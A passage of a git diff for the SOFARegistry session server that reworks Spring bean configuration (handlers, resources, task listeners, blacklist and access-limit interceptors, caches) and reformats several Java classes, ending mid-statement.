list.add(cancelAddressRequestHandler()); + list.add(syncConfigHandler()); + list.add(publisherPbHandler()); + list.add(subscriberPbHandler()); + list.add(syncConfigPbHandler()); + list.add(metadataRegisterPbHandler()); + list.add(serviceAppMappingHandler()); + list.add(metaRevisionHeartbeatHandler()); + list.add(getRevisionHandler()); + + return list; + } + + @Bean(name = "sessionSyncHandlers") + public Collection serverSyncHandlers() { + Collection list = new ArrayList<>(); + list.add(dataSlotDiffDigestRequestHandler()); + list.add(dataSlotDiffPublisherRequestHandler()); + return list; + } + + @Bean + public AbstractServerHandler publisherHandler() { + return new PublisherHandler(); + } + + @Bean + public AbstractServerHandler syncConfigHandler() { + return new SyncConfigHandler(); + } + + @Bean + public AbstractServerHandler subscriberHandler() { + return new SubscriberHandler(); + } + + @Bean + public AbstractServerHandler watcherHandler() { + return new WatcherHandler(); + } + + @Bean + public AbstractServerHandler clientNodeConnectionHandler() { + return new ClientNodeConnectionHandler(); + } + + @Bean + public AbstractServerHandler cancelAddressRequestHandler() { + return new CancelAddressRequestHandler(); + } + + @Bean + public AbstractServerHandler dataSlotDiffDigestRequestHandler() { + return new DataSlotDiffDigestRequestHandler(); + } + + @Bean + public AbstractServerHandler dataSlotDiffPublisherRequestHandler() { + return new DataSlotDiffPublisherRequestHandler(); + } + + @Bean + public AbstractServerHandler publisherPbHandler() { + return new PublisherPbHandler(); + } + + @Bean + public AbstractServerHandler metadataRegisterPbHandler() { + return new MetadataRegisterPbHandler(); + } + + @Bean + public AbstractServerHandler serviceAppMappingHandler() { + return new ServiceAppMappingPbHandler(); + } + + @Bean + public AbstractServerHandler getRevisionHandler() { + return new GetRevisionPbHandler(); + } + + @Bean + public AbstractServerHandler metaRevisionHeartbeatHandler() { + return new MetaRevisionHeartbeatPbHandler(); + } + + @Bean + public AbstractServerHandler subscriberPbHandler() { + return new SubscriberPbHandler(); + } + + @Bean + public AbstractServerHandler syncConfigPbHandler() { + return new SyncConfigPbHandler(); + } + + @Bean(name = "dataNotifyClientHandlers") + public Collection dataClientHandlers() { + Collection list = new ArrayList<>(); + list.add(dataChangeRequestHandler()); + list.add(dataPushRequestHandler()); + return list; + } + + @Bean(name = "metaClientHandlers") + public Collection metaClientHandlers() { + Collection list = new ArrayList<>(); + list.add(notifyProvideDataChangeHandler()); + list.add(slotTableChangeEventHandler()); + return list; + } + + @Bean + public AbstractClientHandler dataChangeRequestHandler() { + return new DataChangeRequestHandler(); + } + + @Bean + public AbstractClientHandler dataPushRequestHandler() { + return new DataPushRequestHandler(); + } + + @Bean + public AbstractClientHandler notifyProvideDataChangeHandler() { + return new NotifyProvideDataChangeHandler(); + } + + @Bean + public SlotTableChangeEventHandler slotTableChangeEventHandler() { + return new SlotTableChangeEventHandler(); + } + } + + @Configuration + public static class ResourceConfiguration { + + @Bean + public ResourceConfig jerseyResourceConfig() { + ResourceConfig resourceConfig = new ResourceConfig(); + resourceConfig.register(JacksonFeature.class); + return resourceConfig; + } + + @Bean + @ConditionalOnMissingBean(name = "sessionOpenResource") + public SessionOpenResource sessionOpenResource() { + return new SessionOpenResource(); + } + + @Bean + public SessionDigestResource sessionDigestResource() { + return new SessionDigestResource(); + } + + @Bean + @ConditionalOnMissingBean(name = "healthResource") + public HealthResource healthResource() { + return new HealthResource(); + } + + @Bean + public ClientsOpenResource clientsOpenResource() { + return new ClientsOpenResource(); + } + + @Bean + public ConnectionsResource connectionsResource() { + return new ConnectionsResource(); + } + + @Bean + public SlotGenericResource slotGenericResource() { + return new SlotGenericResource(); + } + + @Bean + public MetricsResource metricsResource() { + return new MetricsResource(); + } + + @Bean + public RegistryOpsResource opsResource() { + return new RegistryOpsResource(); + } + + @Bean + public ClientManagerResource clientManagerResource() { + return new ClientManagerResource(); + } + } + + @Configuration + public static class SessionRegistryConfiguration { + @Bean + @ConditionalOnMissingBean(name = "sessionRegistry") + public Registry sessionRegistry() { + return new SessionRegistry(); + } + + @Bean + @ConditionalOnMissingBean + public Interests sessionInterests() { + return new SessionInterests(); + } + + @Bean + @ConditionalOnMissingBean + public Watchers sessionWatchers() { + return new SessionWatchers(); + } + + @Bean + @ConditionalOnMissingBean + public DataStore sessionDataStore() { + return new SlotSessionDataStore(); + } + } + + @Configuration + public static class SessionNodeConfiguration { + + @Bean + @ConditionalOnMissingBean + public DataNodeService dataNodeService() { + return new DataNodeServiceImpl(); + } + + @Bean + @ConditionalOnMissingBean + public MetaServerService metaServerService() { + return new MetaServerServiceImpl(); + } + + @Bean + @ConditionalOnMissingBean + public ClientNodeService clientNodeService() { + return new ClientNodeServiceImpl(); + } + + @Bean + @ConditionalOnMissingBean + public FirePushService firePushService() { + return new FirePushService(); + } + + @Bean + @ConditionalOnMissingBean + public PushProcessor pushProcessor() { + return new PushProcessor(); + } + + @Bean + @ConditionalOnMissingBean + public ChangeProcessor changeProcessor() { + return new ChangeProcessor(); + } + @Bean @ConditionalOnMissingBean - public SessionServerBootstrap sessionServerBootstrap() { - return new SessionServerBootstrap(); - } - - @Configuration - public static class SessionServerConfigBeanConfiguration { - @Bean - public CommonConfig commonConfig() { - return new CommonConfig(); - } - - @Bean - @ConditionalOnMissingBean(name = "sessionServerConfig") - public SessionServerConfig sessionServerConfig(CommonConfig commonConfig) { - return new SessionServerConfigBean(commonConfig); - } - - @Bean(name = "PropertySplitter") - public PropertySplitter propertySplitter() { - return new PropertySplitter(); - } - - } - - @Configuration - public static class SessionRemotingConfiguration { - - @Bean - @ConditionalOnMissingBean(name = "boltExchange") - public Exchange boltExchange() { - return new BoltExchange(); - } - - @Bean - public Exchange jerseyExchange() { - return new JerseyExchange(); - } - - @Bean - public NodeExchanger clientNodeExchanger() { - return new ClientNodeExchanger(); - } - - @Bean - public NodeExchanger dataNodeExchanger() { - return new DataNodeExchanger(); - } - - @Bean - public NodeExchanger metaNodeExchanger() { - return new MetaNodeExchanger(); - } - - @Bean(name = "serverHandlers") - public Collection serverHandlers() { - Collection list = new ArrayList<>(); - list.add(publisherHandler()); - list.add(subscriberHandler()); - list.add(watcherHandler()); - list.add(clientNodeConnectionHandler()); - list.add(cancelAddressRequestHandler()); - list.add(syncConfigHandler()); - return list; - } - - @Bean - public AbstractServerHandler publisherHandler() { - return new PublisherHandler(); - } - - @Bean - public AbstractServerHandler syncConfigHandler() { - return new SyncConfigHandler(); - } - - @Bean - public AbstractServerHandler subscriberHandler() { - return new SubscriberHandler(); - } - - @Bean - public AbstractServerHandler watcherHandler() { - return new WatcherHandler(); - } - - @Bean - public AbstractServerHandler clientNodeConnectionHandler() { - return new ClientNodeConnectionHandler(); - } - - @Bean - public AbstractServerHandler cancelAddressRequestHandler() { - return new CancelAddressRequestHandler(); - } - - @Bean(name = "dataClientHandlers") - public Collection dataClientHandlers() { - Collection list = new ArrayList<>(); - list.add(dataNodeConnectionHandler()); - list.add(dataChangeRequestHandler()); - list.add(dataPushRequestHandler()); - return list; - } - - @Bean(name = "metaClientHandlers") - public Collection metaClientHandlers() { - Collection list = new ArrayList<>(); - list.add(metaNodeConnectionHandler()); - list.add(nodeChangeResultHandler()); - list.add(notifyProvideDataChangeHandler()); - return list; - } - - @Bean - public AbstractClientHandler metaNodeConnectionHandler() { - return new MetaNodeConnectionHandler(); - } - - @Bean - public AbstractClientHandler dataNodeConnectionHandler() { - return new DataNodeConnectionHandler(); - } - - @Bean - public AbstractClientHandler dataChangeRequestHandler() { - return new DataChangeRequestHandler(); - } - - @Bean - public AbstractClientHandler dataPushRequestHandler() { - return new DataPushRequestHandler(); - } - - @Bean - public AbstractClientHandler nodeChangeResultHandler() { - return new NodeChangeResultHandler(); - } - - @Bean - public AbstractClientHandler notifyProvideDataChangeHandler() { - return new NotifyProvideDataChangeHandler(); - } - } - - @Configuration - public static class ResourceConfiguration { - - @Bean - public ResourceConfig jerseyResourceConfig() { - ResourceConfig resourceConfig = new ResourceConfig(); - resourceConfig.register(JacksonFeature.class); - return resourceConfig; - } - - @Bean - @ConditionalOnMissingBean(name = "sessionOpenResource") - public SessionOpenResource sessionOpenResource() { - return new SessionOpenResource(); - } - - @Bean - public SessionDigestResource sessionDigestResource() { - return new SessionDigestResource(); - } - - @Bean - @ConditionalOnMissingBean(name = "healthResource") - public HealthResource healthResource() { - return new HealthResource(); - } - - @Bean - public ClientsOpenResource clientsOpenResource() { - return new ClientsOpenResource(); - } - } - - @Configuration - public static class SessionRegistryConfiguration { - @Bean - @ConditionalOnMissingBean(name = "sessionRegistry") - public Registry sessionRegistry() { - return new SessionRegistry(); - } - - @Bean - @ConditionalOnMissingBean - public Interests sessionInterests() { - return new SessionInterests(); - } - - @Bean - @ConditionalOnMissingBean - public Watchers sessionWatchers() { - return new SessionWatchers(); - } - - @Bean - @ConditionalOnMissingBean - public DataStore sessionDataStore() { - return new SessionDataStore(); - } - } - - @Configuration - public static class SessionNodeConfiguration { - - @Bean - @ConditionalOnMissingBean - public DataNodeService dataNodeService() { - return new DataNodeServiceImpl(); - } - - @Bean - public MetaNodeService mataNodeService() { - return new MetaNodeServiceImpl(); - } - - @Bean - @ConditionalOnMissingBean - public ClientNodeService clientNodeService() { - return new ClientNodeServiceImpl(); - } - - @Bean - public NodeManager dataNodeManager() { - return new DataNodeManager(); - } - - @Bean - public NodeManager sessionNodeManager() { - return new SessionNodeManager(); - } - - @Bean - public NodeManager metaNodeManager() { - return new MetaNodeManager(); - } - - @Bean - public RaftClientManager raftClientManager() { - return new RaftClientManager(); - } - - @Bean - public NodeManagerFactory nodeManagerFactory() { - return new NodeManagerFactory(); - } - } - - @Configuration - public static class SessionCacheConfiguration { - - @Bean - public CacheService sessionCacheService() { - return new SessionCacheService(); - } - - @Bean(name = "com.alipay.sofa.registry.server.session.cache.DatumKey") - public CacheGenerator datumCacheGenerator() { - return new DatumCacheGenerator(); - } - } - - @Configuration - public static class SessionTaskConfiguration { - - @Bean - public TaskProcessor dataNodeSingleTaskProcessor() { - return new DataNodeSingleTaskProcessor(); - } - - @Bean - public TaskProcessor metaNodeSingleTaskProcessor() { - return new MetaNodeSingleTaskProcessor(); - } - - @Bean - public TaskProcessor clientNodeSingleTaskProcessor() { - return new ClientNodeSingleTaskProcessor(); - } - - @Bean - public TaskProcessor consoleSyncSingleTaskProcessor() { - return new ConsoleSyncSingleTaskProcessor(); - } - - @Bean - public TaskListener subscriberRegisterFetchTaskListener(TaskListenerManager taskListenerManager) { - TaskListener taskListener = new SubscriberRegisterFetchTaskListener( - dataNodeSingleTaskProcessor()); - taskListenerManager.addTaskListener(taskListener); - return taskListener; - } - - @Bean - public TaskListener subscriberMultiFetchTaskListener(TaskListenerManager taskListenerManager) { - TaskListener taskListener = new SubscriberMultiFetchTaskListener( - dataNodeSingleTaskProcessor()); - taskListenerManager.addTaskListener(taskListener); - return taskListener; - } - - @Bean - public TaskListener watcherRegisterFetchTaskListener(TaskListenerManager taskListenerManager) { - TaskListener taskListener = new WatcherRegisterFetchTaskListener( - metaNodeSingleTaskProcessor()); - taskListenerManager.addTaskListener(taskListener); - return taskListener; - } - - @Bean - public TaskListener provideDataChangeFetchTaskListener(TaskListenerManager taskListenerManager) { - TaskListener taskListener = new ProvideDataChangeFetchTaskListener( - metaNodeSingleTaskProcessor()); - taskListenerManager.addTaskListener(taskListener); - return taskListener; - } - - @Bean - public TaskListener dataChangeFetchTaskListener(TaskListenerManager taskListenerManager) { - TaskListener taskListener = new DataChangeFetchTaskListener( - dataNodeSingleTaskProcessor()); - taskListenerManager.addTaskListener(taskListener); - return taskListener; - } - - @Bean - public TaskListener dataPushTaskListener(TaskListenerManager taskListenerManager) { - TaskListener taskListener = new DataPushTaskListener(dataNodeSingleTaskProcessor()); - taskListenerManager.addTaskListener(taskListener); - return taskListener; - } - - @Bean - public TaskListener dataChangeFetchCloudTaskListener(TaskListenerManager taskListenerManager) { - TaskListener taskListener = new DataChangeFetchCloudTaskListener( - dataNodeSingleTaskProcessor()); - taskListenerManager.addTaskListener(taskListener); - return taskListener; - } - - @Bean - public TaskListener sessionRegisterDataTaskListener(TaskListenerManager taskListenerManager) { - TaskListener taskListener = new SessionRegisterDataTaskListener( - dataNodeSingleTaskProcessor()); - taskListenerManager.addTaskListener(taskListener); - return taskListener; - } - - @Bean - public TaskListener receivedDataMultiPushTaskListener(TaskListenerManager taskListenerManager, - TaskMergeProcessorStrategy receiveDataTaskMergeProcessorStrategy, - SessionServerConfig sessionServerConfig) { - TaskListener taskListener = new ReceivedDataMultiPushTaskListener( - clientNodeSingleTaskProcessor(), receiveDataTaskMergeProcessorStrategy, - sessionServerConfig); - taskListenerManager.addTaskListener(taskListener); - return taskListener; - } - - @Bean - public TaskListener receivedConfigDataPushTaskListener(TaskListenerManager taskListenerManager) { - TaskListener taskListener = new ReceivedConfigDataPushTaskListener( - clientNodeSingleTaskProcessor()); - taskListenerManager.addTaskListener(taskListener); - return taskListener; - } - - @Bean - public TaskListener cancelDataTaskListener(TaskListenerManager taskListenerManager) { - TaskListener taskListener = new CancelDataTaskListener(); - taskListenerManager.addTaskListener(taskListener); - return taskListener; - } - - @Bean - public TaskListenerManager taskListenerManager() { - return new DefaultTaskListenerManager(); - } - - } - - @Configuration - public static class ExecutorConfiguration { - - @Bean - public ExecutorManager executorManager(SessionServerConfig sessionServerConfig) { - return new ExecutorManager(sessionServerConfig); - } - - } - - @Configuration - public static class SessionTimerTaskConfiguration { - - @Bean - public SyncClientsHeartbeatTask syncClientsHeartbeatTask() { - return new SyncClientsHeartbeatTask(); - } - } - - @Configuration - public static class SessionStrategyConfiguration { - @Bean - @ConditionalOnMissingBean - public SessionRegistryStrategy sessionRegistryStrategy() { - return new DefaultSessionRegistryStrategy(); - } - - @Bean - @ConditionalOnMissingBean - public DataChangeRequestHandlerStrategy dataChangeRequestHandlerStrategy() { - return new DefaultDataChangeRequestHandlerStrategy(); - } - - @Bean - @ConditionalOnMissingBean - public SyncConfigHandlerStrategy syncConfigHandlerStrategy() { - return new DefaultSyncConfigHandlerStrategy(); - } - - @Bean - @ConditionalOnMissingBean - public SubscriberRegisterFetchTaskStrategy subscriberRegisterFetchTaskStrategy() { - return new DefaultSubscriberRegisterFetchTaskStrategy(); - } - - @Bean - @ConditionalOnMissingBean - public SubscriberMultiFetchTaskStrategy subscriberMultiFetchTaskStrategy() { - return new DefaultSubscriberMultiFetchTaskStrategy(); - } - - @Bean - @ConditionalOnMissingBean - public PublisherHandlerStrategy publisherHandlerStrategy() { - return new DefaultPublisherHandlerStrategy(); - } - - @Bean - @ConditionalOnMissingBean - public SubscriberHandlerStrategy subscriberHandlerStrategy() { - return new DefaultSubscriberHandlerStrategy(); - } - - @Bean - @ConditionalOnMissingBean - public WatcherHandlerStrategy watcherHandlerStrategy() { - return new DefaultWatcherHandlerStrategy(); - } - - @Bean - @ConditionalOnMissingBean - public TaskMergeProcessorStrategy receiveDataTaskMergeProcessorStrategy() { - return new DefaultPushTaskMergeProcessor(); - } - - @Bean - @ConditionalOnMissingBean - public ReceivedDataMultiPushTaskStrategy receivedDataMultiPushTaskStrategy() { - return new DefaultReceivedDataMultiPushTaskStrategy(); - } - - @Bean - @ConditionalOnMissingBean - public ReceivedConfigDataPushTaskStrategy receivedConfigDataPushTaskStrategy() { - return new DefaultReceivedConfigDataPushTaskStrategy(); - } - } -} \ No newline at end of file + public PushDataGenerator pushDataGenerator() { + return new PushDataGenerator(); + } + } + + @Configuration + public static class SessionCacheConfiguration { + + @Bean + public CacheService sessionCacheService() { + return new SessionCacheService(); + } + + @Bean(name = "com.alipay.sofa.registry.server.session.cache.DatumKey") + public CacheGenerator datumCacheGenerator() { + return new DatumCacheGenerator(); + } + + @Bean + public AppRevisionCacheRegistry appRevisionCacheRegistry() { + return new AppRevisionCacheRegistry(); + } + + @Bean + public AppRevisionHeartbeatRegistry appRevisionHeartbeatRegistry() { + return new AppRevisionHeartbeatRegistry(); + } + } + + @Configuration + public static class SessionTaskConfiguration { + + @Bean + public TaskProcessor metaNodeSingleTaskProcessor() { + return new MetaNodeSingleTaskProcessor(); + } + + @Bean + public TaskProcessor clientNodeSingleTaskProcessor() { + return new ClientNodeSingleTaskProcessor(); + } + + @Bean + public TaskProcessor consoleSyncSingleTaskProcessor() { + return new ConsoleSyncSingleTaskProcessor(); + } + + @Bean + public TaskListener watcherRegisterFetchTaskListener(TaskListenerManager taskListenerManager) { + TaskListener taskListener = + new WatcherRegisterFetchTaskListener(metaNodeSingleTaskProcessor()); + taskListenerManager.addTaskListener(taskListener); + return taskListener; + } + + @Bean + public TaskListener provideDataChangeFetchTaskListener( + TaskListenerManager taskListenerManager) { + TaskListener taskListener = + new ProvideDataChangeFetchTaskListener(metaNodeSingleTaskProcessor()); + taskListenerManager.addTaskListener(taskListener); + return taskListener; + } + + @Bean + public TaskListener receivedConfigDataPushTaskListener( + TaskListenerManager taskListenerManager) { + TaskListener taskListener = + new ReceivedConfigDataPushTaskListener(clientNodeSingleTaskProcessor()); + taskListenerManager.addTaskListener(taskListener); + return taskListener; + } + + @Bean + public TaskListenerManager taskListenerManager() { + return new DefaultTaskListenerManager(); + } + } + + @Configuration + public static class ExecutorConfiguration { + + @Bean(name = "metaNodeExecutor") + public ThreadPoolExecutor metaNodeExecutor(SessionServerConfig sessionServerConfig) { + return new MetricsableThreadPoolExecutor( + "metaExecutor", + sessionServerConfig.getMetaNodeWorkerSize(), + sessionServerConfig.getMetaNodeWorkerSize(), + 300, + TimeUnit.SECONDS, + new ArrayBlockingQueue<>(sessionServerConfig.getMetaNodeBufferSize()), + new NamedThreadFactory("metaExecutor", true)); + } + + @Bean + public ExecutorManager executorManager(SessionServerConfig sessionServerConfig) { + return new ExecutorManager(sessionServerConfig); + } + } + + @Configuration + public static class SessionTimerTaskConfiguration { + + @Bean + public SyncClientsHeartbeatTask syncClientsHeartbeatTask() { + return new SyncClientsHeartbeatTask(); + } + + @Bean + public SessionCacheDigestTask sessionCacheDigestTask() { + return new SessionCacheDigestTask(); + } + + @Bean + public CacheCountTask cacheCountTask() { + return new CacheCountTask(); + } + } + + @Configuration + public static class SessionStrategyConfiguration { + @Bean + @ConditionalOnMissingBean + public SessionRegistryStrategy sessionRegistryStrategy() { + return new DefaultSessionRegistryStrategy(); + } + + @Bean + @ConditionalOnMissingBean + public SyncConfigHandlerStrategy syncConfigHandlerStrategy() { + return new DefaultSyncConfigHandlerStrategy(); + } + + @Bean + @ConditionalOnMissingBean + public PublisherHandlerStrategy publisherHandlerStrategy() { + return new DefaultPublisherHandlerStrategy(); + } + + @Bean + @ConditionalOnMissingBean + public SubscriberHandlerStrategy subscriberHandlerStrategy() { + return new DefaultSubscriberHandlerStrategy(); + } + + @Bean + @ConditionalOnMissingBean + public WatcherHandlerStrategy watcherHandlerStrategy() { + return new DefaultWatcherHandlerStrategy(); + } + + @Bean + @ConditionalOnMissingBean + public ReceivedConfigDataPushTaskStrategy receivedConfigDataPushTaskStrategy() { + return new DefaultReceivedConfigDataPushTaskStrategy(); + } + + @Bean + public AppRevisionHandlerStrategy appRevisionHandlerStrategy() { + return new DefaultAppRevisionHandlerStrategy(); + } + } + + @Configuration + public static class AccessLimitServiceConfiguration { + @Bean + public AccessLimitService accessLimitService(SessionServerConfig sessionServerConfig) { + return new AccessLimitServiceImpl(sessionServerConfig); + } + } + + @Configuration + public static class SessionFilterConfiguration { + + @Bean + public IPMatchStrategy ipMatchStrategy() { + return new DefaultIPMatchStrategy(); + } + + @Bean + public DataIdMatchStrategy dataIdMatchStrategy() { + return new DefaultDataIdMatchStrategy(); + } + + @Bean + @ConditionalOnMissingBean + public ProcessFilter processFilter() { + return new BlacklistMatchProcessFilter(); + } + + @Bean + public BlacklistManager blacklistManager() { + return new BlacklistManagerImpl(); + } + + @Bean + public WrapperInterceptorManager wrapperInterceptorManager() { + return new WrapperInterceptorManager(); + } + + @Bean + public WrapperInterceptor clientCheckWrapperInterceptor( + WrapperInterceptorManager wrapperInterceptorManager) { + ClientCheckWrapperInterceptor clientCheckWrapperInterceptor = + new ClientCheckWrapperInterceptor(); + wrapperInterceptorManager.addInterceptor(clientCheckWrapperInterceptor); + return clientCheckWrapperInterceptor; + } + + @Bean + public WrapperInterceptor blacklistWrapperInterceptor( + WrapperInterceptorManager wrapperInterceptorManager) { + BlacklistWrapperInterceptor blacklistWrapperInterceptor = new BlacklistWrapperInterceptor(); + wrapperInterceptorManager.addInterceptor(blacklistWrapperInterceptor); + return blacklistWrapperInterceptor; + } + + @Bean + public WrapperInterceptor accessLimitWrapperInterceptor( + WrapperInterceptorManager wrapperInterceptorManager) { + AccessLimitWrapperInterceptor accessLimitWrapperInterceptor = + new AccessLimitWrapperInterceptor(); + wrapperInterceptorManager.addInterceptor(accessLimitWrapperInterceptor); + return accessLimitWrapperInterceptor; + } + } + + @Configuration + public static class SessionRenewDatumConfiguration { + + @Bean + public WriteDataAcceptor writeDataAcceptor() { + return new WriteDataAcceptorImpl(); + } + } + + @Configuration + public static class SessionConnectionsConfiguration { + @Bean + public ConnectionsService connectionsService() { + return new ConnectionsService(); + } + + @Bean + public ConnectionMapper connectionMapper() { + return new ConnectionMapper(); + } + } + + @Configuration + public static class SessionProvideDataConfiguration { + + @Bean + public ProvideDataProcessor provideDataProcessorManager() { + return new ProvideDataProcessorManager(); + } + + @Bean + public ProvideDataProcessor blackListProvideDataProcessor( + ProvideDataProcessor provideDataProcessorManager) { + ProvideDataProcessor blackListProvideDataProcessor = new BlackListProvideDataProcessor(); + ((ProvideDataProcessorManager) provideDataProcessorManager) + .addProvideDataProcessor(blackListProvideDataProcessor); + return blackListProvideDataProcessor; + } + + @Bean + public ProvideDataProcessor stopPushProvideDataProcessor( + ProvideDataProcessor provideDataProcessorManager) { + ProvideDataProcessor stopPushProvideDataProcessor = new StopPushProvideDataProcessor(); + ((ProvideDataProcessorManager) provideDataProcessorManager) + .addProvideDataProcessor(stopPushProvideDataProcessor); + return stopPushProvideDataProcessor; + } + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerInitializer.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerInitializer.java index 163a152da..714e53b79 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerInitializer.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerInitializer.java @@ -18,63 +18,62 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; +import java.util.concurrent.atomic.AtomicBoolean; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.context.SmartLifecycle; -import java.util.concurrent.atomic.AtomicBoolean; - /** * SmartLifecycle for SessionServerBootstrap + * * @author shangyu.wh * @version $Id: SessionServerInitializerConfiguration.java, v 0.1 2017-11-14 11:41 synex Exp $ */ public class SessionServerInitializer implements SmartLifecycle { - private static final Logger LOGGER = LoggerFactory - .getLogger(SessionServerInitializer.class); + private static final Logger LOGGER = LoggerFactory.getLogger(SessionServerInitializer.class); - @Autowired - private SessionServerBootstrap sessionServerBootstrap; + @Autowired private SessionServerBootstrap sessionServerBootstrap; - private AtomicBoolean running = new AtomicBoolean(false); + private AtomicBoolean running = new AtomicBoolean(false); - @Override - public boolean isAutoStartup() { - return true; - } + @Override + public boolean isAutoStartup() { + return true; + } - @Override - public void start() { - try { - sessionServerBootstrap.doInitialized(); - LOGGER.info("Started SessionServer"); + @Override + public void start() { + try { + sessionServerBootstrap.start(); + LOGGER.info("Started SessionServer"); - SessionServerInitializer.this.running.set(true); - } catch (Exception ex) { - SessionServerInitializer.this.running.set(false); - LOGGER.error("Could not initialize Session server!", ex); - } + SessionServerInitializer.this.running.set(true); + } catch (Throwable ex) { + SessionServerInitializer.this.running.set(false); + LOGGER.error("Could not initialize Session server!", ex); + System.exit(-1); } + } - @Override - public void stop() { - this.running.set(false); - sessionServerBootstrap.destroy(); - } + @Override + public void stop() { + this.running.set(false); + sessionServerBootstrap.destroy(); + } - @Override - public boolean isRunning() { - return this.running.get(); - } + @Override + public boolean isRunning() { + return this.running.get(); + } - @Override - public int getPhase() { - return 0; - } + @Override + public int getPhase() { + return 0; + } - @Override - public void stop(Runnable callback) { - callback.run(); - this.running.set(false); - } -} \ No newline at end of file + @Override + public void stop(Runnable callback) { + callback.run(); + this.running.set(false); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/CacheAccessException.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/CacheAccessException.java new file mode 100644 index 000000000..9dbca8815 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/CacheAccessException.java @@ -0,0 +1,30 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.cache; + +/** + * exception inner cache, e.g. remote invoke error + * + * @author kezhu.wukz + * @version $Id: CacheAccessException.java, v 0.1 2019-09-02 17:55 kezhu.wukz Exp $ + */ +public class CacheAccessException extends RuntimeException { + + public CacheAccessException(String message, Throwable cause) { + super(message, cause); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/CacheGenerator.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/CacheGenerator.java index 0d8cb9d9c..636ef87b0 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/CacheGenerator.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/CacheGenerator.java @@ -17,18 +17,16 @@ package com.alipay.sofa.registry.server.session.cache; /** - * * @author shangyu.wh * @version $Id: CacheGenerator.java, v 0.1 2017-12-06 17:29 shangyu.wh Exp $ */ public interface CacheGenerator { - /** - * generator cache on write request - * - * @param key - * @return - */ - Value generatePayload(Key key); - -} \ No newline at end of file + /** + * generator cache on write request + * + * @param key + * @return + */ + Value generatePayload(Key key); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/CacheService.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/CacheService.java index 6b95977ab..942083436 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/CacheService.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/CacheService.java @@ -16,27 +16,26 @@ */ package com.alipay.sofa.registry.server.session.cache; -import java.util.Map; - /** - * * @author shangyu.wh * @version $Id: CacheService.java, v 0.1 2017-12-06 20:19 shangyu.wh Exp $ */ public interface CacheService { - /** - * get cache by key - * @param key - * @return - */ - Value getValue(Key key); + /** + * get cache by key + * + * @param key + * @return + */ + Value getValue(Key key) throws CacheAccessException; - Map getValues(final Iterable keys); + Value getValueIfPresent(Key key); - /** - * invalidate cache by keys - * @param keys - */ - void invalidate(Key... keys); -} \ No newline at end of file + /** + * invalidate cache by keys + * + * @param keys + */ + void invalidate(Key... keys); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/DatumCacheGenerator.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/DatumCacheGenerator.java index 4af01f8ff..1860cc8ee 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/DatumCacheGenerator.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/DatumCacheGenerator.java @@ -16,49 +16,46 @@ */ package com.alipay.sofa.registry.server.session.cache; +import com.alipay.sofa.registry.common.model.store.SubDatum; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.server.session.node.service.DataNodeService; +import com.alipay.sofa.registry.util.ParaCheckUtil; import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: DatumCacheGenerator.java, v 0.1 2018-11-19 16:15 shangyu.wh Exp $ */ public class DatumCacheGenerator implements CacheGenerator { - - private static final Logger LOGGER = LoggerFactory.getLogger(DatumCacheGenerator.class); - - /** - * DataNode service - */ - @Autowired - private DataNodeService dataNodeService; - - @Override - public Value generatePayload(Key key) { - - EntityType entityType = key.getEntityType(); - if (entityType instanceof DatumKey) { - DatumKey datumKey = (DatumKey) entityType; - - String dataCenter = datumKey.getDataCenter(); - String dataInfoId = datumKey.getDataInfoId(); - - if (isNotBlank(dataCenter) && isNotBlank(dataInfoId)) { - return new Value(dataNodeService.fetchDataCenter(dataInfoId, dataCenter)); - } else { - LOGGER.warn("Input key " + key + " invalid!"); - } - } else { - LOGGER.warn("Input key " + key + " invalid!"); - } - - return null; - } - - public boolean isNotBlank(String ss) { - return ss != null && !ss.isEmpty(); + private static final Logger LOGGER = LoggerFactory.getLogger("CACHE-GEN"); + /** DataNode service */ + @Autowired DataNodeService dataNodeService; + + @Override + public Value generatePayload(Key key) { + EntityType entityType = key.getEntityType(); + if (entityType instanceof DatumKey) { + DatumKey datumKey = (DatumKey) entityType; + + final String dataCenter = datumKey.getDataCenter(); + final String dataInfoId = datumKey.getDataInfoId(); + ParaCheckUtil.checkNotBlank(dataCenter, "dataCenter"); + ParaCheckUtil.checkNotBlank(dataInfoId, "dataInfoId"); + SubDatum datum = dataNodeService.fetch(dataInfoId, dataCenter); + if (datum == null) { + LOGGER.info("loadNil,{},{}", dataInfoId, dataCenter); + } else { + LOGGER.info( + 